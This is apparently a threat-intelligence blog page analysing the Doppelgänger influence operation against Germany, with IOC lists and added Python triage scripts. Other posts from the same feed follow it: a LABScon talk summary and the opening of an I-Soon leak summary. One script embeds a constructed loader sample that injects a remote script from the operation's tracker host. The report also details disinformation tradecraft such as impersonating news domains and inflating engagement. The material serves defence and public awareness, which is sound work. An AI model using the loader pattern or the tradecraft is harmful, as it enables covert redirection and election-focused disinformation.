
Doppelgänger | Russia-Aligned Influence Operation Targets Germany 

22 February 2024 at 13:55

Executive Summary

  • SentinelLabs and ClearSky Cyber Security have been tracking the activities of a suspected Russia-aligned influence operation network named Doppelgänger.
  • We observed Doppelgänger intensively targeting German audiences, coinciding with recent reports from the German Ministry of Foreign Affairs and Der Spiegel.
  • The network spreads propaganda and disinformation through news articles focused on current socio-economic and geopolitical topics relevant to the general population.
  • Doppelgänger disseminates content criticizing the ruling government coalition and its support for Ukraine, likely aiming to influence public opinion before the upcoming elections in Germany.
  • Doppelgänger leverages a substantial network of X accounts, actively participating in coordinated activities to enhance visibility and engage audiences.

Overview

SentinelLabs and ClearSky Cyber Security have been tracking a propaganda and disinformation campaign since late November 2023, highly likely orchestrated by Doppelgänger, a suspected Russia-aligned influence operation network known for its persistent and aggressive tactics. Initially focusing on disseminating anti-Ukraine content following the onset of the Russo-Ukrainian conflict, Doppelgänger has since broadened its scope, targeting audiences in the US, Israel, Germany, and France.

We observed a significant emphasis by Doppelgänger on targeting German audiences. The network’s activities are characterized by consistent efforts to disseminate propaganda and disinformation content, particularly by exploiting current topics of geopolitical and socio-economic significance among the population. The majority of the content seizes every opportunity to criticize the ruling government coalition and its support for Ukraine.

With Doppelgänger activities intensifying in times of frequent political shifts in Germany, we suspect that the network’s goal is to erode support for the coalition in light of upcoming European Parliament, municipal, and federal state elections, culminating in federal government elections scheduled for 2025.

While we were documenting the Doppelgänger campaign, the German Ministry of Foreign Affairs and the prominent German media outlet Der Spiegel reported on overlapping activities, highlighting a growing concern about election interference.

In this post, we supplement existing reporting by providing additional technical indicators and insights into Doppelgänger’s tactics and disseminated content, with the ultimate goal of further heightening public awareness of this threat.

This report focuses on Doppelgänger activities targeting German audiences; a complementary report by ClearSky Cyber Security delves into the network’s targeting of Israel, the United States, and Ukraine. The activities we observed closely resemble and partially overlap with those previously reported by Recorded Future and Meta, indicating the persistent nature of Doppelgänger.

We observed Doppelgänger orchestrating the operation of a large coordinated network of X (formerly known as Twitter) accounts. These accounts propagate content from third-party websites whose content aligns with Doppelgänger propaganda goals, as well as from sites that Doppelgänger itself has created.

The majority of the X accounts we discovered as part of our investigation had not been deactivated at the time of writing. In an effort to maximize visibility and audience engagement, these accounts participate in coordinated activities, such as regularly posting and reposting content from highly popular profiles, as well as engaging with posts from other suspected Doppelgänger-managed accounts.

The posts from these accounts contain links that redirect visitors through two stages to the destination articles intended for consumption. These stages implement obfuscation and tracking techniques. Coupled with the carefully constructed infrastructure management practices we observed Doppelgänger implementing, this underscores the network’s determination to operate without interruptions while effectively tracking the performance of its influence operations.

Redirection Stages

The first-stage websites, whose links Doppelgänger distributes on X, use thumbnail images hosted at telegra[.]ph as link previews, so that the preview does not reveal the site behind the link, and redirect visitors to second-stage sites.

First-stage website

The second-stage websites contain text unrelated to the campaign and execute JavaScript code obfuscated with Base64 encoding.

Second-stage website

The JavaScript code samples we analyzed issue a request to ggspace[.]space (reported as part of previous Doppelgänger campaigns) or sdgqaef[.]site. The request includes tracking information, which is likely a campaign identifier. These follow the format [country]-[day]-[month]_[domain], where [domain] refers to the domain hosting the destination article (DE-02-01_deintelligenz for an article hosted at deintelligenz[.]com); some identifiers carry an additional numeric suffix. The IOC table at the end of this post lists some of the campaign identifiers we observed.

Second-stage website: Deobfuscated JavaScript code

In addition, the JavaScript code executed by second-stage websites dynamically loads further JavaScript served by ggspace[.]space or sdgqaef[.]site, which implements the logic for generating web content that redirects to a destination article.
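The two-stage chain described above is straightforward to triage offline once a second-stage page has been captured. The following script is an added example written for this post, not code from the report or from the operators: it Base64-decodes the inline script, pulls out any request to the two tracking hosts named in the report, checks whether the decoded code injects a further remote script, and parses the [country]-[day]-[month]_[domain] campaign identifier (including the "-2", "_-2" and "_s" variants seen in the IOC table). The sample page is constructed; the script path (/loader.js) and the query parameter (c=) are assumptions, since the report only states that the request carries the identifier.

```python
"""Triage of a Doppelgänger-style second-stage page (added example, not from the report)."""
import base64
import re
from urllib.parse import urlsplit

TRACKER_HOSTS = {"ggspace.space", "sdgqaef.site"}  # from the report's IOC table

# Anything shaped like an identifier: CC-dd-dd followed by the rest of the token
CANDIDATE_RE = re.compile(r"\b[A-Z]{2}-\d{2}-\d{2}[A-Za-z0-9_.-]*")
# Strict form: country-day-month, optional numeric variant ("DE-23-12-2_..."),
# underscore, domain label, optional trailing "_-2" / "_s" as in the IOC list
ID_RE = re.compile(
    r"^([A-Z]{2})-(\d{2})-(\d{2})(?:-(\d+))?_([A-Za-z0-9.-]+)(?:_(-?\d+|s))?$"
)
ATOB_RE = re.compile(r"atob\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")
URL_RE = re.compile(r"https?://[^\s'\"<>]+")


def parse_campaign_id(token):
    """Return the identifier's fields, or None if the token is not one."""
    m = ID_RE.match(token)
    if not m:
        return None
    country, day, month, variant, label, suffix = m.groups()
    day, month = int(day), int(month)
    if not (1 <= day <= 31 and 1 <= month <= 12):
        return None
    return {"country": country, "day": day, "month": month,
            "variant": variant, "label": label, "suffix": suffix}


def decode_atob_blobs(html):
    """Decode every atob("...") argument found in the page."""
    scripts = []
    for blob in ATOB_RE.findall(html):
        try:
            scripts.append(base64.b64decode(blob, validate=True).decode("utf-8", "replace"))
        except (ValueError, UnicodeDecodeError):
            continue  # not valid Base64: skip rather than abort the triage
    return scripts


def tracker_urls(js):
    """URLs in the decoded script whose host is one of the tracking servers."""
    return [u for u in URL_RE.findall(js) if urlsplit(u).hostname in TRACKER_HOSTS]


def campaign_ids(text):
    ids = []
    for token in CANDIDATE_RE.findall(text):
        parsed = parse_campaign_id(token)
        if parsed and parsed not in ids:
            ids.append(parsed)
    return ids


def triage(html):
    scripts = decode_atob_blobs(html)
    joined = "\n".join(scripts)
    # The report notes the decoded code loads a further script from the tracker host
    loads_remote = bool(re.search(r"createElement\(\s*['\"]script['\"]\s*\)", joined)
                        and re.search(r"\.src\s*=", joined))
    return {"decoded_scripts": len(scripts), "tracker_urls": tracker_urls(joined),
            "campaign_ids": campaign_ids(joined), "loads_remote_script": loads_remote}


# Constructed sample: filler text plus a Base64-wrapped loader, as on the real pages.
# The /loader.js path and the c= parameter are assumptions, not observed values.
_SAMPLE_JS = (
    "var s=document.createElement('script');"
    "s.src='https://sdgqaef.site/loader.js?c=DE-02-01_deintelligenz';"
    "document.head.appendChild(s);"
)
SAMPLE_SECOND_STAGE_HTML = (
    "<html><body><p>Five tips for growing tomatoes on a balcony.</p>"
    '<script>eval(atob("' + base64.b64encode(_SAMPLE_JS.encode()).decode() + '"))</script>'
    "</body></html>"
)

if __name__ == "__main__":
    for key, value in triage(SAMPLE_SECOND_STAGE_HTML).items():
        print(f"{key}: {value}")
```

Running it against a real capture means feeding the saved HTML to `triage()`; the candidate/strict split keeps the matcher tolerant of the suffix variants without accepting arbitrary tokens, and the tracker-host check is what ties a page to this infrastructure rather than to any other redirector.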

JavaScript code from sdgqaef[.]site

sdgqaef[.]site and ggspace[.]space host a login page at the /admin URL path, which we assess to be the login page of the Keitaro Tracking System, a commercial click-tracking and traffic distribution platform. Doppelgänger possibly uses Keitaro to track the effectiveness of its campaigns.

Login page hosted at sdgqaef[.]site

Social Media Activities

Probably in an attempt to increase their visibility, some of the suspected Doppelgänger-managed X accounts we identified regularly post content, which does not necessarily link to first-stage websites, whereas others remain idle for relatively long periods.


An active and an idle suspected Doppelgänger account

We observed accounts posting content linking to first-stage sites in multiple languages of the targeted audiences. Further, Doppelgänger’s account network is probably attempting to increase the engagement metrics of posts that link to first-stage websites in a targeted manner through reposts and views. This becomes evident when these metrics are compared with the metrics of posts by the same accounts that do not link to first-stage websites.

Multi-language posts tailored to the targeted audiences
Engagement metric discrepancies

We identified multiple clusters of suspected Doppelgänger-managed accounts that joined the X platform within the same month. We observed a significant level of coordination in the activities of the accounts within the same cluster, suggesting centralized control. This includes reposting the same content, typically that of highly popular profiles, at almost the same time. In addition, posts that link to first-stage sites from accounts within the same cluster often show very similar engagement metrics.

Coordinated activities

Engagement metric similarities

Our analysis of the engagement metrics for almost all the accounts we identified revealed a range of reposts between 700 and 2000, with a median value of 883, and a range of views between 613 and 14000, with a median value of 5000.
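The three signals discussed in this section (same-month join dates, near-simultaneous reposts of popular profiles, and engagement that is inflated only on posts linking to first-stage sites) can be checked mechanically over an export of account metadata and post records. The script below is an added example written for this post, not code or data from the report; the post records are constructed to resemble the behaviour described, and the field names (account, ts, repost_of, first_stage, reposts, views) are this example's own schema rather than any platform API.

```python
"""Coordination and engagement checks over a constructed sample of X posts (added example)."""
from collections import defaultdict
from datetime import datetime, timedelta
from statistics import median

ACCOUNTS = {  # handle -> join date (constructed)
    "acct_a": "2023-11-03",
    "acct_b": "2023-11-14",
    "acct_c": "2023-11-21",
    "acct_d": "2022-05-09",
}


def _post(account, ts, repost_of=None, first_stage=False, reposts=0, views=0):
    return {"account": account, "ts": ts, "repost_of": repost_of,
            "first_stage": first_stage, "reposts": reposts, "views": views}


POSTS = [  # constructed records
    # three cluster accounts repost the same popular post within about 70 seconds
    _post("acct_a", "2024-01-20T10:00:02", repost_of="popular#1"),
    _post("acct_b", "2024-01-20T10:00:31", repost_of="popular#1"),
    _post("acct_c", "2024-01-20T10:01:10", repost_of="popular#1"),
    _post("acct_d", "2024-01-20T15:00:00", repost_of="popular#1"),  # unrelated, hours later
    # original posts linking to first-stage sites: inflated reposts and views
    _post("acct_a", "2024-01-21T08:00:00", first_stage=True, reposts=883, views=5000),
    _post("acct_b", "2024-01-21T08:00:04", first_stage=True, reposts=890, views=5100),
    _post("acct_c", "2024-01-21T08:00:09", first_stage=True, reposts=870, views=4900),
    # the same accounts' posts without such links barely register
    _post("acct_a", "2024-01-22T09:00:00", reposts=2, views=40),
    _post("acct_b", "2024-01-22T09:30:00", reposts=1, views=35),
    _post("acct_c", "2024-01-22T10:00:00", reposts=3, views=50),
]


def cluster_by_join_month(accounts, min_size=2):
    """Group handles by the month they joined; singletons are dropped."""
    clusters = defaultdict(list)
    for handle, joined in accounts.items():
        clusters[joined[:7]].append(handle)
    return {m: sorted(h) for m, h in clusters.items() if len(h) >= min_size}


def synchronized_reposts(posts, window_seconds=120, min_accounts=3):
    """Targets reposted by >= min_accounts distinct accounts inside one sliding window."""
    window = timedelta(seconds=window_seconds)
    by_target = defaultdict(list)
    for p in posts:
        if p["repost_of"]:
            by_target[p["repost_of"]].append((datetime.fromisoformat(p["ts"]), p["account"]))
    hits = []
    for target, events in by_target.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:
                start += 1
            accounts = {a for _, a in events[start:end + 1]}
            if len(accounts) >= min_accounts:
                hits.append((target, tuple(sorted(accounts))))
                break  # one hit per target is enough to flag it
    return hits


def engagement_gap(posts, metric="reposts"):
    """Per account: median metric on first-stage-linking originals vs. its other originals."""
    buckets = defaultdict(lambda: {"first_stage": [], "other": []})
    for p in posts:
        if p["repost_of"]:
            continue
        key = "first_stage" if p["first_stage"] else "other"
        buckets[p["account"]][key].append(p[metric])
    return {acct: (median(b["first_stage"]), median(b["other"]))
            for acct, b in buckets.items() if b["first_stage"] and b["other"]}


def network_summary(posts):
    """Range and median of reposts/views across all first-stage-linking originals."""
    fs = [p for p in posts if p["first_stage"] and not p["repost_of"]]
    out = {}
    for metric in ("reposts", "views"):
        values = [p[metric] for p in fs]
        out[metric] = {"min": min(values), "max": max(values), "median": median(values)}
    return out


if __name__ == "__main__":
    print("join-month clusters:", cluster_by_join_month(ACCOUNTS))
    print("synchronized reposts:", synchronized_reposts(POSTS))
    print("engagement gap (reposts):", engagement_gap(POSTS))
    print("first-stage post metrics:", network_summary(POSTS))
```

The sliding window in `synchronized_reposts` is deliberately narrow; widening it catches slower batches at the cost of sweeping in organic reposts of genuinely viral content, so the join-month cluster and the per-account engagement gap are what separate a coordinated account from an ordinary fan of the same profile.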

Propaganda and Disinformation Content

Doppelgänger has been very active in creating websites that host articles for consumption by targeted audiences through the previously described multi-stage approach. Among these sites, there are domains and websites impersonating third-party news outlets, which includes mimicking their design, structure, and domain names, such as welt[.]pm (inauthentic) vs. welt[.]de (authentic) and faz[.]ltd (inauthentic) vs. faz[.]net (authentic). We assess that the rest of the websites we observed have been created by Doppelgänger with original design and structure and no indications of impersonating established news platforms.

In most cases, we observed consistent and regular publishing of new content, with only occasional idle periods lasting a few days at most. Some of the content consists of a blend of materials sourced from other websites and translated into the languages of the targeted audiences.

A closer look at the custom-built websites indicates that Doppelgänger has been making a fast-paced effort to bring its websites online and start distributing content. For example, some sites include template text or exhibit errors in search functionalities. Furthermore, nearly all of these websites lack social media presence. They display icons of social media platforms that link to the domains of these platforms rather than specific profiles.

Template text (emphasis added)

Many of the custom-built websites have been built and are managed using the WordPress content management system. We observed that some websites display status messages in Russian when users perform content searches and the activity fails with an error, indicating the use of Russian-language WordPress components.

WordPress status message translates to “Search for”

The majority of the articles Doppelgänger distributes have a strong anti-government narrative, especially in regard to the government’s support of Ukraine. The article snippets we present below are machine-translated from German into English.

An article at arbeitspause[.]org discusses a recent series of strikes by workers in the German public transport demanding better wages and better working conditions. The challenges relating to the state of workers in this sector, such as rising living costs due to inflation and shortage of workers, are a pressing concern in Germany that captures the attention of the broader population.

Article snippet from arbeitspause[.]org, referencing Scholz, the German chancellor (emphasis added)

On a similar note, another article at arbeitspause[.]org focuses on the recent strikes by German farmers, which involved the blockade of major roads and were motivated by rising living costs and the government’s plan to phase out agricultural subsidies. Overlapping at times with the strikes in the public transport sectors, the farmers’ strikes have been disrupting mobility and therefore garnered the attention of the population and mass media. Doppelgänger has attempted to capitalize on the momentum by criticizing the government’s plan regarding agricultural subsidies, drawing a connection to the government’s support for Ukraine.

Article snippet from arbeitspause[.]org

An article at derglaube[.]com focuses on the German immigration policy, which, according to some polls, ranks among the top issues for voters in Germany. In addition, the media frequently covers topics relating to the government’s allocation of funds for immigration-related programs and services. Consistent with typical Doppelgänger practices, the influence operation network uses this opportunity to cast the government in a negative light and introduce its support for Ukraine into the narrative.

Article snippet from derglaube[.]com (original emphasis)
Article snippet from derglaube[.]com (emphasis added)

In an attempt to blend political-oriented propaganda or disinformation among other topics, some websites host articles covering broader subjects such as health, sports, and culture. We observed attempts to introduce propaganda even in such articles. For example, an article hosted at miastagebuch[.]com initially discusses headaches from a medical perspective only to later indicate the German government as one of the major causes of headaches.

Anti-government statements in a health-themed article (emphasis added)

We emphasize that Doppelgänger also targets Germany through articles published by third-party outlets, such as telepolis[.]de, freiewelt[.]net, overton-magazin[.]de, and deutschlandkurier[.]de.

The articles from these outlets that Doppelgänger disseminates focus on both domestic and international topics, some with a strong anti-Western narrative. For instance, an article from overton-magazin[.]de portrays the West as profiteering from the Russo-Ukrainian conflict, while depicting Ukraine as a plaything of Western global players (cit.).

Article snippet from overton-magazin[.]de (emphasis added)

Additionally, an article from osthessen-news[.]de highlights factors such as the Ukraine war and inflation as contributors to economic challenges in Germany, prompting medium-sized companies to consider restructuring due to escalating costs. Issues concerning small- and mid-sized companies are particularly relevant to the broader German audience, given their significant contribution to the country’s overall economy.

Article snippet from osthessen-news[.]de

Infrastructure

The Doppelgänger infrastructure can be divided into four parts, each subject to different management and control practices and each hosting a different component of the content delivery chain: the first-stage redirection websites, the second-stage redirection websites, the servers likely used for monitoring campaign performance (ggspace[.]space and sdgqaef[.]site), and the destination websites.

The first-stage and second-stage websites often shift between a variety of hosting providers, such as Hostinger, Global Internet Solutions, and DigitalOcean. The domains of these websites typically have short lifespans, remaining active for only several days at a time and recurring multiple times over a few years. We observe that Doppelgänger activates the domains for brief periods during its campaigns before deactivating them again.

The domains of the first-stage websites span a diverse range of top-level domains (TLDs), including generic TLDs such as .buzz, .art, .store, .site, and .online, as well as country-code TLDs such as .uk (under .co.uk) and .br (under .com.br). The domains’ format suggests automated generation, combining random-looking subdomains with numerical suffixes on the registered domain, for example, pcrrjx.kredit-money-fun169[.]buzz and yzrhhk.kredit-money-fun202[.]buzz.

This strategy, combined with the frequent rotation between hosting providers and the cyclical nature of the domains, indicates an effort by Doppelgänger to evade detection and tracking of its first-stage infrastructure, which is exposed on social media platforms and therefore more likely to be subjected to scrutiny. Doppelgänger does not apply the same domain naming convention to second-stage websites, which are not directly exposed on social media platforms.
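Because the first-stage domains are the part of the chain that surfaces in public posts, the naming pattern described above is the practical hunting handle. The script below is an added example written for this post, not tooling from the report: it refangs the "[.]" notation, splits a host into subdomain, registrable label and suffix, scores the two traits the report highlights (a short random-looking subdomain, and a numbered label on a cheap generic TLD), and groups numbered variants into families. The suffix table is a deliberately tiny stand-in for the public suffix list, the cheap-TLD set is the report's list plus .lol (which appears in its IOCs), and the sample hosts are the report's own first-stage indicators.

```python
"""Heuristics for Doppelgänger first-stage domain naming (added example, not from the report)."""
import re
from collections import defaultdict

MULTI_LABEL_SUFFIXES = {"co.uk", "com.br"}  # stand-in for the public suffix list
CHEAP_TLDS = {"buzz", "art", "store", "site", "online", "lol"}

SAMPLE_DOMAINS = [  # first-stage websites from the report's IOC table
    "09474w.reyt-cre-ad34[.]buzz", "1wifsq.c-majac-ann4[.]buzz",
    "3wk8wa.kariz-good-ad10[.]buzz", "62ogyy[.]internetbusinesslondon[.]co[.]uk",
    "6fmb3r[.]great-cred195[.]buzz", "buegym.ranking-kariz108[.]buzz",
    "d6egyr.borafazerfestaoficial[.]online", "nice-credits-list266[.]buzz",
    "nw3m7o.samaritana.com[.]br", "o21obd.reyt-credbest-mx29[.]buzz",
    "pcrrjx.kredit-money-fun169[.]buzz", "sbl63p.kredit-money-fun274[.]buzz",
    "v5yoaq.chilling[.]lol", "yzrhhk.kredit-money-fun202[.]buzz",
]


def refang(host):
    return host.replace("[.]", ".").strip().lower()


def split_host(host):
    """-> (subdomain labels, registrable label, suffix) using the tiny suffix table."""
    labels = refang(host).split(".")
    if len(labels) < 2:
        return [], labels[0], ""
    n = 2 if len(labels) >= 3 and ".".join(labels[-2:]) in MULTI_LABEL_SUFFIXES else 1
    suffix = ".".join(labels[-n:])
    return labels[:-n - 1], labels[-n - 1], suffix


def score_first_stage(host):
    """Flag hosts that look like the automated first-stage pattern."""
    subs, label, suffix = split_host(host)
    reasons = []
    if subs and re.fullmatch(r"[a-z0-9]{6}", subs[0]):
        reasons.append("random6-subdomain")  # heuristic: review, do not block on it alone
    if re.search(r"\d+$", label):
        reasons.append("numbered-label")
    if suffix.split(".")[-1] in CHEAP_TLDS:
        reasons.append("cheap-tld")
    flagged = "random6-subdomain" in reasons or {"numbered-label", "cheap-tld"} <= set(reasons)
    return {"host": refang(host), "registrable": f"{label}.{suffix}",
            "reasons": reasons, "flagged": flagged}


def family_key(host):
    """Registrable domain with its trailing counter stripped, plus the counter (or None)."""
    _, label, suffix = split_host(host)
    m = re.search(r"\d+$", label)
    stem = label[:m.start()] if m else label
    return f"{stem}.{suffix}", (int(m.group()) if m else None)


def group_families(hosts):
    """Map each numbered family to the sorted counters seen across the input."""
    families = defaultdict(list)
    for h in hosts:
        key, counter = family_key(h)
        if counter is not None:
            families[key].append(counter)
    return {k: sorted(v) for k, v in families.items()}


if __name__ == "__main__":
    for d in SAMPLE_DOMAINS:
        r = score_first_stage(d)
        print(f"{str(r['flagged']):5} {r['host']:45} {','.join(r['reasons'])}")
    print(group_families(SAMPLE_DOMAINS))
```

The family grouping is the useful output for proactive blocking: once kredit-money-fun169 and kredit-money-fun202 are known, the counters in between and beyond are worth pre-registering in a watchlist, and passive DNS for the stem catches them when they come online for their few days of use.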

Playing a central role in Doppelgänger’s campaigns, ggspace[.]space and sdgqaef[.]site are responsible for both redirection and presumably monitoring campaign performance. They are hosted behind a cloud-based reverse proxy infrastructure, likely implemented as a security measure to obfuscate their true hosting locations. In contrast to the first-stage and second-stage domains, the active periods of these domains typically span several months during Doppelgänger’s campaigns.

Many of the servers hosting the destination websites are managed using cPanel, and some implement geofencing, which restricts traffic to IP addresses from targeted countries. This practice is likely intended to minimize exposure of their infrastructure and content to scrutiny and monitoring by researchers or authorities outside those regions, reducing the likelihood of detection and investigation into Doppelgänger’s activities.

The domains of the majority of these websites were first registered in the first quarter of 2023 and some as early as mid-2022, remaining active as of the time of writing. A smaller subset of domains, such as derglaube[.]com, which we assess with high confidence as being managed by Doppelgänger at this time, have been active for nearly 10 years, with intermittent periods of inactivity lasting a few years at most.

Conclusions

Doppelgänger represents an active instrument of information warfare, characterized by strategic use of propaganda and disinformation to influence public opinion. The campaign targeting Germany we discussed in this post serves as a compelling example of the persistent and continually evolving nature of Russia-aligned influence operations, which exploit social media and current topics of geopolitical and socio-economic significance to shape perceptions.

We anticipate that Doppelgänger’s activities, targeting not only Germany but also other Western countries, will persist and evolve, particularly in light of the major elections scheduled across the EU and the USA in the coming years. We expect Doppelgänger to continue innovating its infrastructure and obfuscation tactics to make its activities more difficult to detect and disrupt.

We emphasize that countering influence operations requires a comprehensive and collaborative approach, involving enhancing public awareness and media literacy to identify and resist manipulation, alongside prompt and effective actions by social media platforms and infrastructure operators to limit the spread of propaganda and disinformation online.

SentinelLabs continues to monitor Doppelgänger activities and remains committed to timely reporting on its operations to improve public awareness of this threat and mitigate its impact.

Indicators of Compromise

Due to the extensive volume of observed indicators, we present here only a selection, including indicators from parallel campaigns targeting France alongside those targeting German audiences.

Domains

Value Note
09474w.reyt-cre-ad34[.]buzz First-stage website
1wifsq.c-majac-ann4[.]buzz First-stage website
3wk8wa.kariz-good-ad10[.]buzz First-stage website
62ogyy[.]internetbusinesslondon[.]co[.]uk First-stage website
6fmb3r[.]great-cred195[.]buzz First-stage website
allons-y[.]social Doppelgänger-managed destination website
antiwar[.]com Third-party website whose articles Doppelgänger disseminates
arbeitspause[.]org Doppelgänger-managed destination website
arizztar[.]com Second-stage website
bfmtv[.]com Third-party website whose articles Doppelgänger disseminates
bluetoffee-books[.]com Second-stage website
brennendefrage[.]com Doppelgänger-managed destination website
buegym.ranking-kariz108[.]buzz First-stage website
contre-attaque[.]net Third-party website whose articles Doppelgänger disseminates
d6egyr.borafazerfestaoficial[.]online First-stage website
deintelligenz[.]com Doppelgänger-managed destination website
derbayerischelowe[.]info Doppelgänger-managed destination website
derglaube[.]com Doppelgänger-managed destination website
derrattenfanger[.]net Doppelgänger-managed destination website
deutschlandkurier[.]de Third-party website whose articles Doppelgänger disseminates
faridmehdipour[.]com Second-stage website
faz[.]ltd Doppelgänger-managed destination website
freeebooktemplates[.]com Second-stage website
freiewelt[.]net Third-party website whose articles Doppelgänger disseminates
ggspace[.]space Server likely used for monitoring campaign performance
grunehummel[.]com Doppelgänger-managed destination website
histoireetsociete[.]com Third-party website whose articles Doppelgänger disseminates
hungarianconservative[.]com Third-party website whose articles Doppelgänger disseminates
jungefreiheit[.]de Third-party website whose articles Doppelgänger disseminates
kaputteampel[.]com Doppelgänger-managed destination website
ledialogue[.]fr Third-party website whose articles Doppelgänger disseminates
legrandsoir[.]info Third-party website whose articles Doppelgänger disseminates
leparisien[.]re Doppelgänger-managed destination website
lildoxi[.]com Second-stage website
miastagebuch[.]com Doppelgänger-managed destination website
mt-secure-bnk[.]com Second-stage website
nice-credits-list266[.]buzz First-stage website
nw3m7o.samaritana.com[.]br First-stage website
o21obd.reyt-credbest-mx29[.]buzz First-stage website
osthessen-news[.]de Third-party website whose articles Doppelgänger disseminates
overton-magazin[.]de Third-party website whose articles Doppelgänger disseminates
pcrrjx.kredit-money-fun169[.]buzz First-stage website
profesionalvirtual[.]com Second-stage website
realpeoplesreviews[.]com Second-stage website
referendud[.]com Second-stage website
restuapp[.]com Second-stage website
sbl63p.kredit-money-fun274[.]buzz First-stage website
sdgqaef[.]site Server likely used for monitoring campaign performance
sueddeutsche[.]ltd Doppelgänger-managed destination website
telepolis[.]de Third-party website whose articles Doppelgänger disseminates
uncut-news[.]ch Third-party website whose articles Doppelgänger disseminates
v5yoaq.chilling[.]lol First-stage website
voltairenet[.]org Third-party website whose articles Doppelgänger disseminates
wanderfalke[.]net Doppelgänger-managed destination website
welt[.]pm Doppelgänger-managed destination website
www.nachdenkseiten[.]de Third-party website whose articles Doppelgänger disseminates
yzrhhk.kredit-money-fun202[.]buzz First-stage website

Campaign Identifiers

DE-02-01_deintelligenz
DE-09-01_derrattenfanger
DE-13-01_nachdenkseiten_-2
DE-13-01_telepolis_-2
DE-15-11_deutschlandkurier
DE-17-11_jungefreiheit
DE-21-11_freiewelt
DE-23-12-2_arbeitspause
DE-24-11_grunehummel
DE-25-01_brennendefrage
DE-25-01_derglaube
DE-25-01_welt
DE-27-12_faz
DE-27-12_miastagebuch_-2
DE-27-12_sueddeutsche
DE-29-01_derbayerischelowe
FR-03-02_candidat
FR-03-02_lexomnium_-2
FR-04-02_allons-y
FR-13-01_original
FR-19-01_bfmtv_s
FR-23-12-2_franceeteu
FR-23-12-2_leparisien
FR-25-01_la-sante
FR-26-12_hungarianconservative
FR-26-12_lepoint_-2
FR-26-12_voltairenet
FR-27-12_ledialogue
FR-27-12_lesfrontieres

Suspected Doppelgänger-managed X/Twitter Accounts

AyniyeMcca18343
Brent8332812692
ButzlaffF6068
chareaterc59681
Chris423806
Dan2082135
elasagev1981744
Equinoxevt4
Eric69112331297
Eric81026324555
izaguine65954
jacksanbac66126
Jermaine1384705
Jim388251815042
Joseph673224507
Kevin1135109
Kristin1039811
Marc182057
Marc1826509
Mark5768674550
MeadowOf43589
MehetabelW87922
MGlasscock91268
Mike3614071710
MingoGerri92116
MissyVoorh3954
MitchamNis5726
MKarg84246
ModestiaH56404
ModestineF72279
MonteroTer52325
MontesRodi62373
moore_tess5916
MorelockSo28285
MorganMcqu33699
MunroHelen78796
MurdockTip96177
myrta53009
NancyOrona49857
NannySpeer51042
NatalaWelb47593
Natasha90680770
NaylorVida41053
NCraighead92692
NFridley71438
Nikki9265841534
NikoliaE39574
NJean52219
NKuehner28951
OClodfelte8787
of_navy23563
of_novelis81275
OlguinElsy987
Oliver1325592
Omar37785134192
Pam807954589169
PauliHarry9140
PegeenD80598
Pete1192428369
Rayshaw78069964
Rounak1685212
Tim298432442090

LABScon Replay | Chasing Shadows | The Rise of a Prolific Espionage Actor

By: LABScon
20 February 2024 at 21:12

In an engaging exploration at LABScon, Kris McConkey unveils the evolution and significance of a cyber espionage actor, dubbed a “superpower” in the digital espionage arena. This actor, initially engaged in phishing campaigns, has matured into one of the most technically sophisticated and deeply entrenched entities in cyber espionage.

Evolution

Tracing back over a decade, public and private intelligence reports have consistently highlighted the actor’s growing sophistication. From early stages marked by widespread malware distribution, such as PlugX and ShadowPad, to a more controlled dissemination of advanced tools like Crosswalk and Sidewalk, the actor has demonstrated a strategic tightening of their operational framework.

Technical Sophistication

The actor’s technical prowess is evident in its use of ShadowPad, a tool that first emerged around 2015 and whose evolution SentinelOne has analyzed in depth. Notably, ShadowPad has been adopted by at least 13 distinct threat actors, showcasing its wide influence. The introduction of the ScatterBee loader in 2020 marked a significant technical leap, showcasing advanced obfuscation techniques that complicate malware analysis efforts.

Operational Tactics

The presentation delves into the operational intricacies of the espionage actor, including their unique approach to malware loading and execution. A notable shift was observed in August 2022, with the discovery of a new ShadowPad variant that employed a novel execution mechanism, further emphasizing the actor’s ongoing innovation and adaptation.

Global Reach and Sector Focus

The actor’s operational scope is global, impacting over 35 countries across various sectors. This widespread engagement underscores the actor’s strategic intent and capability to infiltrate various targets, from governmental bodies to the telecommunications sector. Their focus extends to high-value targets, leveraging tailored malware like FunnySwitch and Spider for specific operations.

Infrastructure and Techniques

An in-depth analysis of the actor’s infrastructure reveals a multi-layered approach, involving relay networks and virtual private servers to obfuscate their activities. This infrastructure supports various capabilities, from direct victim access to sophisticated tunneling techniques, enabling the actor to maintain a persistent foothold in victim environments.

Insights Based on Numbers

  • The actor has evolved over ten years, highlighting their long-term presence and impact.
  • ShadowPad has been utilized by 13 distinct threat actors, indicating its widespread adoption.
  • The espionage network has targeted over 35 countries, demonstrating its global reach.

In conclusion, the rise of this espionage actor from modest beginnings to becoming a formidable force in cyber espionage illustrates a significant shift in the cyber threat landscape. Their ability to innovate, adapt, and execute sophisticated cyber operations underscores the need for advanced defensive strategies and international cooperation to counteract their pervasive influence.


About the Presenter

Kris leads PwC’s Global Cyber Threat Intelligence practice, which tracks a wide variety of targeted threat actors operating from more than 25 countries.

Kris also leads the EMEA Cyber Threat Operations practice – a front line technical services group responsible for a portfolio of defensive and offensive cyber security services to help clients detect and respond to cyber security threats and incidents. He has spent the past 17 years at PwC delivering cyber incident response, threat hunting and threat research services to global clients.

About LABScon 2023

This presentation was featured live at LABScon, an immersive 3-day conference bringing together the world’s top cybersecurity minds, hosted by SentinelOne’s research arm, SentinelLabs.

Unmasking I-Soon | The Leak That Revealed China’s Cyber Operations

Executive Summary

  • I-Soon (上海安洵), a company that contracts for many PRC agencies–including the Ministry of Public Security, Ministry of State Security, and People’s Liberation Army–was subject to a data leak over the weekend of Feb 16th. It is not known who pilfered the information or what their motives were, but this leak provides a first-of-its-kind look at the internal operations of a state-affiliated hacking contractor. The authenticity of the documents has not yet been established. While the leak’s contents do confirm public threat intelligence, efforts to further corroborate the documents are ongoing.
  • The leak provides some of the most concrete details seen publicly to date, revealing the maturing nature of China’s cyber espionage ecosystem. It shows explicitly how government targeting requirements drive a competitive marketplace of independent contractor hackers-for-hire.
  • I-Soon–whose employees complain about low pay and gamble over mahjong in the office–appears to be responsible for the compromise of at least 14 governments, pro-democracy organizations in Hong Kong, universities, and NATO. The leaked documents align with previous threat intel on several named threat groups.
  • Victim data and targeting lists, as well as names of the clients who requested them, show a company that competes for low-value hacking contracts from many government agencies. This finding indicates that historical targeting information from Advanced Persistent Threats thought to be PRC contractors does not provide strong guidance on future targets.
